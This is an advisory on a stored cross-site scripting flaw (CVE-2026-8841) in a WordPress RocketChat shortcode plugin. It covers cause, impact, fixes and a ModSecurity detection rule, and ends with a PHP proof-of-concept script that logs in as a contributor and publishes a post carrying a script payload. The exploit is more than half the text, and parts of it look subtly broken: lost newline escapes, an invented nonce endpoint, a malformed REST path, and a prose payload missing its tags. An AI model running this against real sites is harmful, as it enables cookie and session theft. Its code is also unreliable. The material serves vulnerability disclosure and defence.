Atomic Edge analysis of CVE-2026-8841 (metadata-based): This vulnerability describes a stored cross-site scripting (XSS) flaw in the Extra Settings for RocketChat plugin for WordPress, affecting all versions up to and including 0.1. The flaw resides in the ‘rocketchat’ shortcode’s ‘title’ attribute, processed by the rxstg_shortcode() function. Authenticated users with Contributor-level access or higher can exploit it to inject arbitrary web scripts. The CVSS score of 6.4 indicates a medium severity with a low confidentiality and integrity impact.
Root Cause: The CWE-79 classification and the vulnerability description confirm that the rxstg_shortcode() function fails to sanitize user input from the ‘title’ shortcode attribute. The plugin directly concatenates this attribute into the generated HTML output without using WordPress escaping functions like esc_attr() or esc_html(). This lack of output escaping allows an attacker to inject arbitrary JavaScript or HTML. Atomic Edge research infers that the shortcode likely outputs something like
…
with the title attribute inserted unsafely, as no code diff was available for confirmation.
Exploitation: An authenticated attacker with at least Contributor-level permissions can exploit this by creating or editing a WordPress post or page containing the [rocketchat] shortcode. The attack vector involves setting the ‘title’ attribute to a malicious JavaScript payload, for example: [rocketchat title=”alert(document.cookie)”]. When a victim views the page, the injected script executes in their browser session. The attacker does not need to interact with AJAX or REST endpoints; the exploitation occurs through the standard WordPress post editor interface.
Remediation: The fix requires the plugin to properly sanitize and escape the ‘title’ attribute before output. Atomic Edge analysis recommends using wp_kses_post() or sanitize_text_field() on the shortcode attribute value, and then applying esc_attr() when outputting it into an HTML attribute context. The plugin should also implement capability checks beyond the default WordPress role, though Contributor access is the threshold. Since no patched version exists, site owners should either remove the plugin or disable shortcode execution for untrusted roles using a user role editor plugin.
Impact: Successful exploitation enables an attacker to execute arbitrary JavaScript within the context of any logged-in user who views the infected page. This can lead to session hijacking, cookie theft, forced redirection to malicious sites, or defacement. The attacker cannot achieve remote code execution, but the stored nature of the XSS means the attack persists until the content is deleted or patched.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
SecRule REQUEST_URI "@beginsWith /wp-json/wp/v2/" "id:20268841,phase:2,deny,status:403,chain,msg:'CVE-2026-8841 - XSS via rocketchat shortcode in REST API',severity:'CRITICAL',tag:'CVE-2026-8841'"
SecRule REQUEST_METHOD "@streq POST" "chain"
SecRule ARGS:content "@rx \[rocketchat[^\]]*title=[^<]*<script" "t:urlDecodeUni,t:htmlEntityDecode,chain"
SecRule ARGS:content "@rx <script[^>]*>" "t:urlDecodeUni"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-8841 - Extra Settings for RocketChat <= 0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
// This PoC assumes:
// - Target WordPress site has the plugin installed and activated.
// - Attacker has valid credentials for a Contributor-level or higher user.
// - WordPress REST API is enabled (default).
// - The site uses application passwords or the attacker can log in via cookie-based auth.
// Configuration
$target_url = 'https://example.com'; // Change this to the target WordPress site
$username = 'attacker_contributor'; // Attacker's WordPress username
$password = 'attacker_password'; // Attacker's password
// Step 1: Authenticate to get a nonce and cookie
$login_url = $target_url . '/wp-login.php';
$login_data = array(
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => 1
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$login_response = curl_exec($ch);
// Check if login succeeded (look for admin bar or dashboard in response)
if (strpos($login_response, 'wp-admin') === false) {
die('Login failed. Check credentials or cookies.');
}
echo "[+] Successfully logged in.n";
// Step 2: Fetch the REST API nonce for post creation
$nonce_url = $target_url . '/wp-admin/admin-ajax.php?action=rest-nonce';
curl_setopt($ch, CURLOPT_URL, $nonce_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$nonce_response = curl_exec($ch);
$nonce = trim($nonce_response);
echo "[+] Got REST nonce: $noncen";
// Step 3: Create a new post with the malicious shortcode
$post_url = $target_url . '/wp/v2/posts';
$malicious_title = '<script>alert("XSS by Atomic Edge");</script>';
$post_data = array(
'title' => 'Atomic Edge XSS Test',
'content' => '[rocketchat title="' . $malicious_title . '"]',
'status' => 'publish'
);
$headers = array(
'Content-Type: application/json',
'X-WP-Nonce: ' . $nonce
);
curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$post_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code == 201) {
$post_json = json_decode($post_response, true);
$post_id = $post_json['id'];
echo "[+] Post created successfully. Post ID: $post_idn";
echo "[+] Visit: " . $target_url . '/?p=' . $post_id . " to trigger the XSS.n";
} else {
echo '[-] Failed to create post. HTTP code: ' . $http_code . "n";
echo 'Response: ' . $post_response . "n";
}
curl_close($ch);
?>
